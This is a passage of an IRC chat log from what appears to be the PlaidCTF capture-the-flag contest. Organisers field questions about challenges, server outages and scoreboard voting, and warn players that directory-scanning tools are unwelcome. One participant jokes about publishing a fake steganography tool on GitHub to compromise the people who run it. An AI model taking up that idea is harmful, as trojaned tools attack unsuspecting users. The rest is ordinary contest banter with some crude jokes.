  3764. (12:30:28) (+mserrano) plssssssssssssssssssssssssssss
  3765. (12:30:30) (mouth`) can we pm a mod about whatscat?
  3766. (12:30:35) (+tylerni7) mouth`: sure
  3767. (12:30:43) (inter) pyjail?
  3768. (12:30:46) (inter) fuck that
  3769. (12:31:03) (inter) every method i could think of is wrong
  3770. (12:31:06) ••• qUit: (Sin__) ([email protected]) Quit: retq
  3771. (12:32:09) ••• jOin: (garganoth) ([email protected])
  3772. (12:32:27) ••• jOin: (_bcc) ([email protected])
  3773. (12:34:54) ••• jOin: (mah_one_) ([email protected])
  3774. (12:36:16) ••• qUit: (ayrx) ([email protected]) Quit: Leaving
  3775. (12:36:47) ••• qUit: (_bcc) ([email protected]) Ping timeout: 240 seconds
  3776. (12:37:18) ••• qUit: (mah_one) ([email protected]) Ping timeout: 245 seconds
  3777. (12:37:20) ••• nIck: (mah_one_) is now known as (mah_one)
  3778. (12:38:35) (+tylerni7) pctf_scoreboard: poop
  3779. (12:38:55) (+mserrano) tylerni7: no u
  3780. (12:39:03) ••• jOin: (_bcc) ([email protected])
  3781. (12:40:36) ••• qUit: (approximatehack) (7ab354c7@gateway/web/freenode/ip.122.179.84.199) Ping timeout: 240 seconds
  3782. (12:41:10) (+mserrano) whee DS
  3783. (12:41:18) (+mserrano) Gynvael: j00ru: :)
  3784. (12:41:31) (mak`) actualy Redford ;]
  3785. (12:41:43) (+tylerni7) nice :)
  3786. (12:41:48) (Redford) hard task :)
  3787. (12:41:58) (supersat) which one is the windows exe?
  3788. (12:42:04) (+mserrano) supersat: paris
  3789. (12:43:26) (evertokki) the eiffel tower!
  3790. (12:43:32) • evertokki throws a random trout
  3791. (12:43:52) (+dickoff) tylerni7: don't leak keys!
  3792. (12:44:01) (+tylerni7) oh shoot
  3793. (12:44:07) (+tylerni7) now everyone knows poop is a key :(
  3794. (12:44:59) ••• jOin: (asmoday) ([email protected])
  3795. (12:45:32) ••• mOde: (ChanServ) sets (+o mserrano)
  3796. (12:45:34) ••• qUit: (stk|) ([email protected]) Ping timeout: 250 seconds
  3797. (12:45:51) ••• tOpic: (mserrano) changes topic to (CTF has started but server is having issues | play.plaidctf.com | since tylerni7 leaked it, poop is a flag)
  3798. (12:45:57) ••• mOde: (mserrano) sets (-o mserrano)
  3799. (12:46:02) (evertokki) lol
  3800. (12:46:10) (+tylerni7) D:
  3801. (12:46:12) (+tylerni7) I'm sorry guys
  3802. (12:46:17) (evertokki) lool
  3803. (12:47:25) ••• qUit: (Frisk0) (~Frisk0@2601:7:9e00:8f:7113:3ac:9f72:3881) Quit: Quitte
  3804. (12:49:11) ••• qUit: (lfogel) ([email protected]) Ping timeout: 240 seconds
  3805. (12:49:17) ••• qUit: (f00b4r_) ([email protected]) Quit: f00b4r_
  3806. (12:49:36) ••• jOin: (sewilton) ([email protected])
  3807. (12:49:42) (inter) brb exam
  3808. (12:49:44) (inter) huehue
  3809. (12:49:54) (bobsteam) gl!
  3810. (12:49:59) (sewilton) Is wheeeee down? 54.82.75.29:8193
  3811. (12:50:58) (mrsmith67) anyone i can ask about misc250?
  3812. (12:51:17) (+mserrano) sewilton: responds to me
  3813. (12:51:23) (+mserrano) sewilton: it's not a web page, you need to nc to it
  3814. (12:52:03) (zzoru) vote time :)
  3815. (12:52:54) (mouth`)
  3816. (12:52:54) (sewilton) mserrano: Whoops, thanks
  3817. (12:53:22) ••• qUit: (frozencemetery) ([email protected]) Ping timeout: 250 seconds
  3818. (12:54:47) ••• qUit: (gameredan) (~gameredan@unaffiliated/gameredan) Ping timeout: 240 seconds
  3819. (12:55:05) ••• qUit: ([SF]testdata) (75c1ace7@gateway/web/freenode/ip.117.193.172.231) Ping timeout: 240 seconds
  3820. (12:55:47) ••• qUit: (valis) ([email protected]) Ping timeout: 240 seconds
  3821. (12:56:15) (evertokki) VOTE FOR 2
  3822. (12:56:18) (evertokki) HINTS
  3823. (12:56:19) (evertokki) HINTS
  3824. (12:56:41) (evertokki) OR 5 IDONT CARE
  3825. (12:58:03) ••• jOin: (valis) ([email protected])
  3826. (12:59:20) ••• jOin: (frozencemetery) ([email protected])
  3827. (12:59:21) ••• mOde: (ChanServ) sets (+v frozencemetery)
  3828. (12:59:49) ••• qUit: (zoff_ita) ([email protected]) Quit: Leaving.
  3829. (13:01:10) (player10) is rendezvous (misc250) down?
  3830. (13:01:22) (+tylerni7) player10: no
  3831. (13:01:26) (player10) okay tnx
  3832. (13:02:28) (supersat) yeah the windows one is evil :P
  3833. (13:04:38) ••• qUit: (netsurf3) ([email protected]) Ping timeout: 252 seconds
  3834. (13:05:29) ••• jOin: (mascot) ([email protected])
  3835. (13:05:54) ••• jOin: (altf4) ([email protected])
  3836. (13:06:09) ••• qUit: (JustMeAsd) ([email protected]) Remote host closed the connection
  3837. (13:06:18) ••• qUit: (humper) (~r@unaffiliated/humber) Quit: Leaving
  3838. (13:06:26) ••• jOin: (sorin) (5e34c7a9@gateway/web/freenode/ip.94.52.199.169)
  3839. (13:06:32) ••• jOin: (Frisk0) ([email protected])
  3840. (13:08:07) (evertokki) wait is the vote over
  3841. (13:08:27) (evertokki) wats happening to the chronosphere
  3842. (13:08:56) ••• pArt: (Noxr) ([email protected])
  3843. (13:10:07) (evertokki) is 'chronosphere discharge 2 minutes ago' supposed to be normal..?
  3844. (13:10:15) ••• jOin: (shadghost) ([email protected])
  3845. (13:10:22) (+mserrano) evertokki: says in a minute for me
  3846. (13:10:24) (shadghost) Hi, is the tor one down atm?
  3847. (13:10:39) (Zoro) it's not down. You just have to rendezvous.
  3848. (13:10:57) (evertokki) mserrano: hmm, I guess its my computer's problem then.
  3849. (13:11:12) ••• qUit: (sevzero) ([email protected]) Quit: Leaving
  3850. (13:11:36) (evertokki) THE CHANCE
  3851. (13:11:41) (evertokki) THE HOLY F
  3852. (13:11:53) (+mserrano) lol have you guys ever gotten chance to do anything
  3853. (13:12:18) (fuzyll) tylerni7: mserrano: you guys suck...i can't tell the difference between what we've solved and what no one has solved
  3854. (13:12:18) ••• jOin: (lfogel) ([email protected])
  3855. (13:12:23) (fuzyll) pick better colors
  3856. (13:12:24) (+mserrano) fuzyll: =\
  3857. (13:12:30) (+mserrano) blame cai_
  3858. (13:12:35) ••• jOin: (cybertech) (4432fdee@gateway/web/freenode/ip.68.50.253.238)
  3859. (13:12:46) (+mserrano) fuzyll: well, if you look at the number in the bottom rightof the thing
  3860. (13:12:46) (fuzyll) cai_: be nicer to your colorblind players :P
  3861. (13:12:50) (+mserrano) the like x/y number
  3862. (13:12:57) ••• jOin: (Cailou) ([email protected])
  3863. (13:12:59) (+mserrano) the y is the total number of problem parts; the x is the number that you have solved
  3864. (13:13:45) (fuzyll) mmm...alright....i /guess/ there's some redundancy :P
  3865. (13:13:57) (+mserrano) yeah
  3866. (13:14:03) (+mserrano) not ideal, but hopefully that's at least something
  3867. (13:14:13) (evertokki) lol
  3868. (13:14:31) (fuzyll) i'll manage lol
  3869. (13:14:51) (fuzyll) was just really confused when i thought we'd somehow solved wheeee
  3870. (13:14:58) (+mserrano) ah yeah
  3871. (13:15:00) (fuzyll) 'cause it's just a huge line of yellow
  3872. (13:15:03) (+mserrano) whee is a good problem :D
  3873. (13:15:06) (+mserrano) I'm totally not biased
  3874. (13:15:17) (fuzyll) then had people tell me that the solved problems are not, in fact, yellow :(
  3875. (13:15:18) (tarkiz) :-B
  3876. (13:15:32) (+mserrano) are they green or something?
  3877. (13:15:39) • +mserrano hasn't actually ever seen a solved problem on this board
  3878. (13:15:42) (tarkiz) wow on mine that was a mustached smiley
  3879. (13:15:43) (fuzyll) that's what people keep telling me, but they're _wrong_ :P
  3880. (13:16:11) ••• qUit: (gut) ([email protected]) Quit: My MacBook Pro has gone to sleep. ZZZzzz…
  3881. (13:16:33) (evertokki) lol
  3882. (13:17:16) (Redford) guys, how it was possible to jump to "doge_stage"?
  3883. (13:17:50) (+mserrano) because it skips solved problems
  3884. (13:17:55) (+mserrano) and chances if you're currently on a chance
  3885. (13:18:07) (pctf_scoreboard) ^^
  3886. (13:18:09) (pctf_scoreboard) ^^
  3887. (13:18:10) (Redford) oh, ok
  3888. (13:18:21) ••• mOde: (ChanServ) sets (+o mserrano)
  3889. (13:18:26) (tomcr00se) yay qualed for codejam
  3890. (13:18:28) ••• mOde: (mserrano) sets (+v pctf_scoreboard)
  3891. (13:18:31) ••• mOde: (mserrano) sets (-o mserrano)
  3892. (13:18:32) (+mserrano) tomcr00se: lol
  3893. (13:18:44) (sorin) gj for codejam ;)
  3894. (13:19:05) (sorin) i had an issue at B for even the first dataset
  3895. (13:19:15) (sorin) the example worked fine but not their dataset
  3896. (13:19:22) (tomcr00se) now time to play more pctf
  3897. (13:19:32) (tomcr00se) i didn't miss on B
  3898. (13:19:45) (tomcr00se) i missed the first time on D because i didn't think
  3899. (13:19:53) (+ricky) tomcr00se: You didn't miss my awesome problem :-P
  3900. (13:20:12) (tomcr00se) ricky: yay
  3901. (13:20:35) ••• qUit: ([gon]starmie) (8ff8eb9c@gateway/web/freenode/ip.143.248.235.156) Ping timeout: 240 seconds
  3902. (13:20:59) (+mserrano) tomcr00se: solve rsa
  3903. (13:21:05) (qll) stego :'(
  3904. (13:21:12) (+mserrano) lol, you guys chose it!
  3905. (13:24:09) (+pctf_scoreboard) 1=chance, 2=forensics250, 3=chance, 4=web200, 5=chance, 6=pwnable200
  3906. (13:24:37) (sven) 2 \o/
  3907. (13:24:56) (tomcr00se) omg 6
  3908. (13:25:13) (HotShot) fuzzyl
  3909. (13:25:32) (HotShot) are you from New Mexico Tech Fuzyll?
  3910. (13:25:41) (tomcr00se) doge_steg is hard
  3911. (13:26:04) (fuzyll) HotShot: ...what would i get if i said yes?
  3912. (13:26:12) (shadghost) wait... did it jump from 30 min to discharge to 5 min.
  3913. (13:26:30) (evertokki) lol
  3914. (13:26:37) (+mserrano) shadghost: time decreases as more people solve the problem
  3915. (13:26:52) (evertokki) oh that makes sense!
  3916. (13:26:52) (shadghost) melanie: only the current problem?
  3917. (13:27:05) (+mserrano) only the current problem
  3918. (13:27:11) (shadghost) got it
  3919. (13:27:17) (+mserrano) if you solve the other unsolved problem it immediately ends voting and starts another voting period
  3920. (13:27:39) (shadghost) by ends you mean it actavates?
  3921. (13:27:47) (+awreece) see also
  3922. (13:27:48) (+awreece) http://play.plaidctf.com/rules
  3923. (13:27:53) (+mserrano) it unlocks the current-in-the-lead problem yes
  3924. (13:27:54) ••• nIck: (x56) is now known as (_NSA_)
  3925. (13:27:58) ••• nIck: (_NSA_) is now known as (x56)
  3926. (13:29:26) (factoreal) hi all
  3927. (13:29:42) (factoreal) who solve web_150? i have question about that
  3928. (13:29:53) (+mserrano) factoreal: you can pm me
  3929. (13:30:19) ••• jOin: (s3Rious) ([email protected])
  3930. (13:31:05) ••• qUit: (evertokki) (d9a5709e@gateway/web/freenode/ip.217.165.112.158) Ping timeout: 240 seconds
  3931. (13:31:23) ••• qUit: (Stean) ([email protected]) Quit: Leaving.
  3932. (13:31:38) (jarCrack) is there a server version of ezhp?
  3933. (13:31:39) ••• jOin: (fal7Q) ([email protected])
  3934. (13:31:46) (fal7Q) hi people
  3935. (13:31:47) (HotShot) you would get a thumbs down fuzyll, a big fat thumbs down
  3936. (13:32:01) (fal7Q) got some questions
  3937. (13:32:09) ••• qUit: (s_kunk) ([email protected]) Ping timeout: 252 seconds
  3938. (13:32:10) (fal7Q) im new in this ctf
  3939. (13:32:19) (HotShot) jk fuzyll i know you're from NYIT
  3940. (13:32:23) (fal7Q) are we allowed to use scanning tools?
  3941. (13:32:30) (HotShot) i remember you from CSAW :D
  3942. (13:32:33) ••• jOin: (s3Ri0us) ([email protected])
  3943. (13:32:57) (fuzyll) i'm not from there at all, though i /was/ a CSAW judge
  3944. (13:33:19) (n00bz) who done g++
  3945. (13:33:19) (n00bz) ?
  3946. (13:33:25) (fal7Q) to solve the challanges
  3947. (13:33:28) (fal7Q) ?
  3948. (13:33:58) (+mserrano) fal7Q: what do you mean by scanning tools?
  3949. (13:34:02) (+mserrano) if you mean dirbuster, pls no
  3950. (13:34:07) (+mserrano) nmap also won't help you
  3951. (13:34:07) (+mserrano) etc
  3952. (13:34:10) (sorin) ahh .. anyone from here solved whatscats?
  3953. (13:34:15) (fal7Q) yeah?
  3954. (13:34:23) (fal7Q) i.e they r prohibited
  3955. (13:34:26) (fuzyll) mserrano: but how do i hack web shit if i can't run nikto on everything?
  3956. (13:34:26) (fal7Q) ?
  3957. (13:34:26) (+mserrano) dirbuster will not solve the problem
  3958. (13:34:29) (HotShot) Elexander Taylor
  3959. (13:34:31) (+mserrano) and it will only piss us off
  3960. (13:34:31) (HotShot) Alexander
  3961. (13:34:35) (HotShot) we will buy you tons of pizza
  3962. (13:34:36) (HotShot) k?
  3963. (13:34:37) (+mserrano) and we will ban your ip from the problem
  3964. (13:34:47) ••• jOin: ([1]Knight) ([email protected])
  3965. (13:34:53) ••• qUit: (sekjrhkjr) ([email protected]) Ping timeout: 252 seconds
  3966. (13:34:53) (fuzyll) mserrano: i can only use kali linux plz make challs easier in future kthx
  3967. (13:34:58) (+pctf_scoreboard) 1=forensics250, 2=web200, 3=pwnable200, 4=crypto200, 5=reversing300, 6=misc350
  3968. (13:35:00) (+mserrano) lol
  3969. (13:35:37) (HotShot) fuck i dried a hexdump on doge_stego and kali crashed
  3970. (13:35:45) (HotShot) is that supposed to happen -.-
  3971. (13:35:57) (sorin) anyone can help me with a hint on whatscats? i don't understand something
  3972. (13:36:05) (fuzyll) HotShot: that's just the implant crashing - try it again, but this time on your host box
  3973. (13:36:15) (HotShot) fosho
  3974. (13:36:25) (HotShot) but i need to email it from vmwareplayer though
  3975. (13:36:38) (HotShot) i cant figure out where the files go when i unpack tarballs in cygwin
  3976. (13:36:51) (HotShot) and vi doesnt help a whole lot in that terminal
  3977. (13:37:16) (+mserrano) gcc (reversing 300) opened
  3978. (13:38:09) (lassimus) mserrano: did you write another challenge based off your compiler's class again?
  3979. (13:38:13) (+mserrano) no
  3980. (13:38:22) (+mserrano) there will be another one day, but not this year
  3981. (13:38:22) (fuzyll) plz no cnot v2
  3982. (13:38:28) (lassimus) lol
  3983. (13:38:43) (+mserrano) fuzyll: you're not excited for cninetynine?
  3984. (13:38:48) (fuzyll) D:
  3985. (13:38:50) (lassimus) I haven't looked at gcc, that was just a bad guess
  3986. (13:39:22) (n00bz) anyone has done g++ or ezhp?
  3987. (13:39:27) (Valodim) can I ask someone about whatscat?
  3988. (13:39:50) (+pctf_scoreboard) btw, gcc is down for a few minutes
  3989. (13:39:59) (fal7Q) guys, i had no experience in it security issues like in pctf, do u recommend to me to keep to play or to skip
  3990. (13:40:05) ••• qUit: (pctf527) (46b9d762@gateway/web/freenode/ip.70.185.215.98) Ping timeout: 240 seconds
  3991. (13:40:16) (+mserrano) whatscat: ping me
  3992. (13:40:18) (+mserrano) g++/ezhp: ping me
  3993. (13:40:20) (fuzyll) fal7Q: how are you supposed to learn if you don't play?
  3994. (13:40:56) (s3Rious) can anyone give a hint for paris (RE 300) ? :)
  3995. (13:41:15) (sven) jeeez. what's the point of hints?
  3996. (13:41:18) (Ymgve) s3Ri0us: bang your head agaist your desk till everything becomes clear
  3997. (13:41:19) (sven) how are you going to learn anything?
  3998. (13:42:10) (mak`) quick question about zfs?
  3999. (13:42:18) (+mserrano) mak`: what's up
  4000. (13:42:26) ••• jOin: (tokki) (d9a5709e@gateway/web/freenode/ip.217.165.112.158)
  4001. (13:42:54) ••• jOin: (sorin_) (5e34c7a9@gateway/web/freenode/ip.94.52.199.169)
  4002. (13:43:35) ••• qUit: (zzoru) (8ff8f941@gateway/web/freenode/ip.143.248.249.65) Ping timeout: 240 seconds
  4003. (13:44:03) (s3Rious) Ymgve: I've done it. Now I have a headache....
  4004. (13:44:04) (tokki) hudak is giving me cancer
  4005. (13:44:05) ••• qUit: (Luffy) (47cfa62b@gateway/web/freenode/ip.71.207.166.43) Quit: Page closed
  4006. (13:44:23) ••• jOin: (s_kunk) ([email protected])
  4007. (13:44:38) ••• qUit: (sorin) (5e34c7a9@gateway/web/freenode/ip.94.52.199.169) Ping timeout: 240 seconds
  4008. (13:44:38) (kanghee) I'm starting to hate white cats
  4009. (13:45:12) (sorin_) i also have issues there kanghee
  4010. (13:45:53) ••• jOin: (x7r0n) ([email protected])
  4011. (13:46:21) (tokki) lol
  4012. (13:47:01) ••• qUit: (DaramG) (8ff8eb18@gateway/web/cgi-irc/kiwiirc.com/ip.143.248.235.24) Quit: http://www.kiwiirc.com/ - A hand crafted IRC client
  4013. (13:47:11) (fal7Q) what kind of file is this ezhp?
  4014. (13:47:17) (fal7Q) :)
  4015. (13:47:29) (player10) executable
  4016. (13:50:40) ••• qUit: (Tokage-Kira) (uid15875@gateway/web/irccloud.com/x-qbloircajjrvxuam) Quit: Connection closed for inactivity
  4017. (13:50:51) ••• jOin: (Yerer) ([email protected])
  4018. (13:51:25) (x7r0n) any ops for for100 ? or what is the pattern for it ?
  4019. (13:53:35) (corpille) so stega much cool
  4020. (13:53:52) ••• jOin: (halfvollemelk) (589f763c@gateway/web/freenode/ip.88.159.118.60)
  4021. (13:54:20) (+tylerni7) x7r0n: I mean
  4022. (13:54:21) (+tylerni7) it's stego
  4023. (13:54:24) (+tylerni7) find hidden flage
  4024. (13:54:28) (+tylerni7) very hidden
  4025. (13:54:31) (x7r0n) i got it
  4026. (13:54:32) (+tylerni7) much flage
  4027. (13:54:33) (player10) much secret?
  4028. (13:54:34) (+tylerni7) so stego
  4029. (13:54:35) (x7r0n) can i pm u
  4030. (13:54:36) ••• jOin: (lkwpeter) ([email protected])
  4031. (13:54:40) (+tylerni7) x7r0n: sue
  4032. (13:54:46) (x7r0n) i mean i feel its the correct..can i ?
  4033. (13:54:49) (x7r0n) ok :-)
  4034. (13:55:29) ••• qUit: (oej) ([email protected]) Ping timeout: 258 seconds
  4035. (13:55:33) ••• qUit: (HotShot) (43a49c58@gateway/web/cgi-irc/kiwiirc.com/ip.67.164.156.88) Quit: http://www.kiwiirc.com/ - A hand crafted IRC client
  4036. (13:56:06) ••• jOin: (eZpl0it) ([email protected])
  4037. (13:56:28) (eZpl0it) :>
  4038. (13:56:47) ••• qUit: (subsnake) ([email protected]) Ping timeout: 240 seconds
  4039. (13:57:05) (Gynvael) tylerni7: https://107.21.133.9/ from re300 is up?
  4040. (13:57:57) (+tylerni7) Gynvael: it's getting fixed..
  4041. (13:58:02) (Gynvael) ack
  4042. (13:58:11) (+tylerni7) sorry
  4043. (13:58:14) ••• jOin: (nvs) (6adc406e@gateway/web/cgi-irc/kiwiirc.com/ip.106.220.64.110)
  4044. (13:58:28) (Gynvael) no worries, just making sure it's not an IP backdoor, but a TCP one
  4045. (13:58:33) (Gynvael) ;D
  4046. (13:58:36) (Guest76035) So for tiffany, if I am running outside a debugger, should I be seeing ptrace errors?
  4047. (13:58:41) ••• jOin: (Mawat) ([email protected])
  4048. (13:58:45) (+tylerni7) Gynvael: xP
  4049. (13:58:49) ••• qUit: (razvanc) ([email protected]) Remote host closed the connection
  4050. (13:58:52) (+tylerni7) backdoor? whatever could you mean :O
  4051. (13:59:07) ••• jOin: (gameredan) ([email protected])
  4052. (13:59:23) ••• jOin: (Stean) ([email protected])
  4053. (13:59:29) (jduck) Gynvael: did you try dirbuster?
  4054. (13:59:30) (Gynvael) tylerni7: nevermind, I mixed up the tasks
  4055. (13:59:31) ••• nIck: (gameredan) is now known as (Guest24706)
  4056. (13:59:34) (Gynvael) jduck: hey man
  4057. (13:59:43) (jduck) ;D
  4058. (13:59:48) (+tylerni7) ;)
  4059. (13:59:51) (+tylerni7) hey jduck
  4060. (13:59:59) (Gynvael) jduck: yeah! it couldn't connect on 1 server, to I started it on amazon 100 machines
  4061. (14:00:04) (+tylerni7) lol
  4062. (14:00:07) (Gynvael) jduck: just to be sure I get my fair share of cpu
  4063. (14:00:14) ••• jOin: (netsurf3) ([email protected])
  4064. (14:00:17) (+tylerni7) when we give source, it really makes me sad when people use dirbuster
  4065. (14:00:25) (jduck) LOL
  4066. (14:00:27) ••• jOin: (olkis) (4e087709@gateway/web/freenode/ip.78.8.119.9)
  4067. (14:00:28) (Gynvael) hahahaha
  4068. (14:00:29) (Gynvael) lolz
  4069. (14:00:38) (robbje) people will always use dirbuster :>
  4070. (14:00:47) (+tylerni7) we should really set up some IDS or something that auto detects dirbuster
  4071. (14:00:48) (robbje) dirbusters gonna dirbust!
  4072. (14:00:51) (jduck) they were hoping for http://challenge.server/key.txt
  4073. (14:01:06) (mongo12) ban all dirbusters!
  4074. (14:01:17) (mongo12) and then hang them
  4075. (14:01:19) (mongo12) \o/
  4076. (14:01:34) (+tylerni7) yeah, we block IPs when stuff DoS's
  4077. (14:01:45) (foundation) tylerni7: it could be a research paper, IDS that detect only lame attacks and lets in sophisticated ones!
  4078. (14:01:47) (Gynvael) tylerni7: reply with fake flags on common dirbuster queries
  4079. (14:01:53) (Gynvael) haha
  4080. (14:02:14) (+tylerni7) foundation: haha
  4081. (14:03:16) (mongo12) haha
  4082. (14:03:19) ••• jOin: (InternalCumBustI) (43a49c58@gateway/web/cgi-irc/kiwiirc.com/ip.67.164.156.88)
  4083. (14:03:33) (jduck) Gynvael: nooooo, they they will try to submit them all!
  4084. (14:03:38) (mongo12) in most cases, you could probably do, more than X reqs in Y secs, iptables drop for 5min
  4085. (14:03:52) (mongo12) should stop it pretty fast
  4086. (14:04:02) (Pitr_) Time to introduce fake flags with penalty-points
  4087. (14:04:12) (jduck) :)
  4088. (14:04:22) ••• qUit: (fnstenv) ([email protected]) Ping timeout: 264 seconds
  4089. (14:04:30) ••• jOin: (wa1ker) (6adc5e91@gateway/web/cgi-irc/kiwiirc.com/ip.106.220.94.145)
  4090. (14:04:35) ••• qUit: (Cailou) ([email protected]) Ping timeout: 240 seconds
  4091. (14:04:50) (foundation) you know what i'm gonna do for the next time, i'll make a fake stegano tool and put it on SF and github , and pwn people that use random tools to try to solve stupid stegano challenges
  4092. (14:04:54) (wa1ker) !misc
  4093. (14:05:03) ••• jOin: (Adran) (adran@botters/staff/adran)
  4094. (14:05:04) (foundation) who opens a stegano challenge , anyway?
  4095. (14:05:06) ••• jOin: (Cailou) ([email protected])
  4096. (14:05:27) ••• jOin: (knc) (310f825d@gateway/web/freenode/ip.49.15.130.93)
  4097. (14:05:38) (Gynvael) jduck: that's the idea!
  4098. (14:05:43) (Gynvael) jduck: and each flag, -10 points!
  4099. (14:05:44) (Gynvael) ;D
  4100. (14:05:57) (Gynvael) flags of shame or sth
  4101. (14:05:58) (+tylerni7) Gynvael: xD
  4102. (14:06:07) (+tylerni7) we've discussed things like this >.<
  4103. (14:06:14) (Gynvael) hah ;)
  4104. (14:06:16) (Gynvael) awesome
  4105. (14:06:19) ••• qUit: (c0ax) ([email protected]) Remote host closed the connection
  4106. (14:06:45) (InternalCumBustI) im so confused on doge_stego I know where the message is but i have no clue how to get it
  4107. (14:07:03) ••• pArt: (fal7Q) ([email protected])
  4108. (14:07:14) ••• qUit: (nvs) (6adc406e@gateway/web/cgi-irc/kiwiirc.com/ip.106.220.64.110) Quit: http://www.kiwiirc.com/ - A hand crafted IRC client
  4109. (14:07:26) (player10) copy paste
  4110. (14:08:08) ••• jOin: (j0e__) ([email protected])
  4111. (14:08:25) (InternalCumBustI) copy paste what?
  4112. (14:08:40) (ShortKidd) ohhey heartbleed worked the first time.
  4113. (14:09:34) (player10) copy paste the flag
  4114. (14:09:36) (+pctf_scoreboard) gcc server is up. thank you for you patience and flying PPPair.
  4115. (14:09:52) (+tylerni7) heh
  4116. (14:10:13) (Gynvael) thanks
  4117. (14:10:32) (mouth`) argh whatscat! we've exploited you why you no give flag??
  4118. (14:11:10) (ShortKidd) HAve you asked nicely?
  4119. (14:11:34) (+tylerni7) mouth`: you can pm me perhaps
  4120. (14:11:40) (+tylerni7) you probably didn't exploit it hard enough
  4121. (14:11:52) ••• jOin: (fritz[]) ([email protected])
  4122. (14:11:58) (+tylerni7) :)
  4123. (14:12:03) (player10) did you try turning your exploit off and on again?
  4124. (14:12:17) (ShortKidd) Try asking nicely. I know I wouldn't do something for you if you exploited me.
  4125. (14:12:22) (halfvollemelk) any tips for rendezvous challenge?
  4126. (14:12:24) (halfvollemelk) i'm stuck
  4127. (14:12:44) ••• qUit: (ir|na) ([email protected]) Quit: leaving
  4128. (14:13:06) ••• jOin: (awesie) (~awesie@freenode/sponsor/awesie)
  4129. (14:13:13) (n00bz) who i can pm about web300?
  4130. (14:13:17) ••• mOde: (ChanServ) sets (+v awesie)
  4131. (14:13:22) (mouth`) tried asking the t-rex nicely yeah
  4132. (14:13:23) (Adran) trex cat must be repaired :>
  4133. (14:13:26) ••• jOin: (nullProtectorate) ([email protected])
  4134. (14:13:40) ••• qUit: (trelgak) ([email protected]) Read error: Connection reset by peer
  4135. (14:14:18) ••• qUit: (olkis) (4e087709@gateway/web/freenode/ip.78.8.119.9) Quit: Page closed
  4136. (14:14:38) ••• qUit: (checkmayte) ([email protected]) Quit: checkmayte
  4137. (14:14:57) ••• jOin: (TMT) ([email protected])
  4138. (14:15:33) (iZsh) the number of PM is increasing it seems
  4139. (14:15:51) (+tylerni7) ?
  4140. (14:16:09) (Mawat) The Chandler relay servers, is there just 1?
  4141. (14:16:21) (+tylerni7) Mawat: there are multiple
  4142. (14:16:29) (Mawat) So I can use any?
  4143. (14:16:29) (+tylerni7) houqp: is the authority though (it's his problem)
  4144. (14:16:34) (+houqp) yes
  4145. (14:16:42) (+houqp) any of them will work
  4146. (14:17:47) ••• qUit: (drzoid) ([email protected]) Ping timeout: 240 seconds
  4147. (14:19:04) ••• qUit: (pez) ([email protected]) Quit: WeeChat 0.4.3
  4148. (14:19:05) ••• qUit: (bobsteam) (1817f0b6@gateway/web/freenode/ip.24.23.240.182) Ping timeout: 240 seconds
  4149. (14:20:22) ••• qUit: (wooyaggo) ([email protected]) Quit: wooyaggo
  4150. (14:20:22) ••• qUit: (Stean) ([email protected]) Quit: Leaving.
  4151. (14:20:29) ••• jOin: (pctf533) (46b9d762@gateway/web/freenode/ip.70.185.215.98)
  4152. (14:20:57) (asmoday) I cannot get shit on this
  4153. (14:21:25) (+houqp) have you tried poop?
  4154. (14:21:44) (Anyny0) x)
  4155. (14:21:52) (tokki) lol
  4156. (14:22:02) ••• jOin: (DKay) (uid11914@gateway/web/irccloud.com/x-hwffhwtrovwugdvc)
  4157. (14:22:03) (asmoday) whatacat failed to email, mtpox got admin.php failed, heartbleed none of my scripts dump anything, paris ollydbg just execptions, pyjail just get registers no flags
  4158. (14:22:36) (asmoday) time to apply at mcdonalds or walmart
  4159. (14:23:29) (pctf533) lol
  4160. (14:23:51) ••• qUit: (copyleft_) ([email protected]) Ping timeout: 258 seconds
  4161. (14:24:07) ••• qUit: (Anyny0) (6babd56d@gateway/web/cgi-irc/kiwiirc.com/ip.107.171.213.109) Quit: http://www.kiwiirc.com/ - A hand crafted IRC client
  4162. (14:24:16) (Brooklynt_Overfl) Everyone needs a plan B. There is always stripping.
  4163. (14:24:29) (nullProtectorate) lol
  4164. (14:24:50) (x_x) Just solved my first stego challenge. Walmart avoided. Faith in self, restored.
  4165. (14:24:51) (x_x) >_>
  4166. (14:24:52) (x_x) <_<
  4167. (14:24:55) (asmoday) I have a not so large member, so perhaps nursing home stripping
  4168. (14:25:09) (+tylerni7) lol
  4169. (14:25:10) (+gbarboza) Awk
  4170. (14:25:26) • +tylerni7 almost spat water on his screen
  4171. (14:25:40) (asmoday) like bad grandpa deal
  4172. (14:25:50) ••• qUit: (s3Rious) ([email protected]) Quit: s3Rious
  4173. (14:27:14) (asmoday) anybody want to get addicted to drugs instead of these crazy challenges
  4174. (14:27:59) ••• qUit: (TMT) ([email protected]) Ping timeout: 240 seconds
  4175. (14:28:01) ••• jOin: (kurtisebear) (sid28273@gateway/web/irccloud.com/x-ettntmmjyjvsqznk)
  4176. (14:28:48) ••• jOin: (n00b13) (~n00b13@unaffiliated/nitsua)
  4177. (14:29:37) ••• qUit: (n00bz) ([email protected]) Remote host closed the connection
  4178. (14:29:38) (+gbarboza) asmoday: Why not both?
  4179. (14:29:58) ••• jOin: (ari_) ([email protected])
  4180. (14:30:20) ••• jOin: (bobsteam) (1817f0b6@gateway/web/freenode/ip.24.23.240.182)
  4181. (14:30:40) (asmoday) this is too stressful for multitasking
  4182. (14:31:45) ••• jOin: (xhs) (5e88c674@gateway/web/freenode/ip.94.136.198.116)
  4183. (14:34:11) ••• qUit: (j0f) (~j0f@unaffiliated/j0f) Ping timeout: 240 seconds
  4184. (14:35:52) ••• qUit: (wa1ker) (6adc5e91@gateway/web/cgi-irc/kiwiirc.com/ip.106.220.94.145) Quit: http://www.kiwiirc.com/ - A hand crafted IRC client
  4185. (14:35:56) (x7r0n) 2012 pwnies
  4186. (14:36:03) (x7r0n) guess u shld have made 2014
  4187. (14:36:06) (x7r0n) :-p
  4188. (14:37:11) ••• qUit: (Mawat) ([email protected]) Ping timeout: 240 seconds
  4189. (14:37:12) ••• jOin: (anyny0) (6babd56d@gateway/web/cgi-irc/kiwiirc.com/ip.107.171.213.109)
  4190. (14:39:07) ••• jOin: (ubuntor) ([email protected])
  4191. (14:39:58) ••• jOin: (Mawat) ([email protected])
  4192. (14:42:05) ••• jOin: (subsnake) ([email protected])
  4193. (14:42:06) ••• jOin: (Tapyroe___) ([email protected])
  4194. (14:42:12) ••• qUit: (Tapyroe___) ([email protected]) Client Quit
  4195. (14:42:16) ••• qUit: (Tapyroe__) ([email protected]) Read error: Connection reset by peer
  4196. (14:42:19) (a13k) is rendezvous working as expected?
  4197. (14:42:29) (anyny0) Probably
  4198. (14:42:36) (+tylerni7) a13k: almost certainly
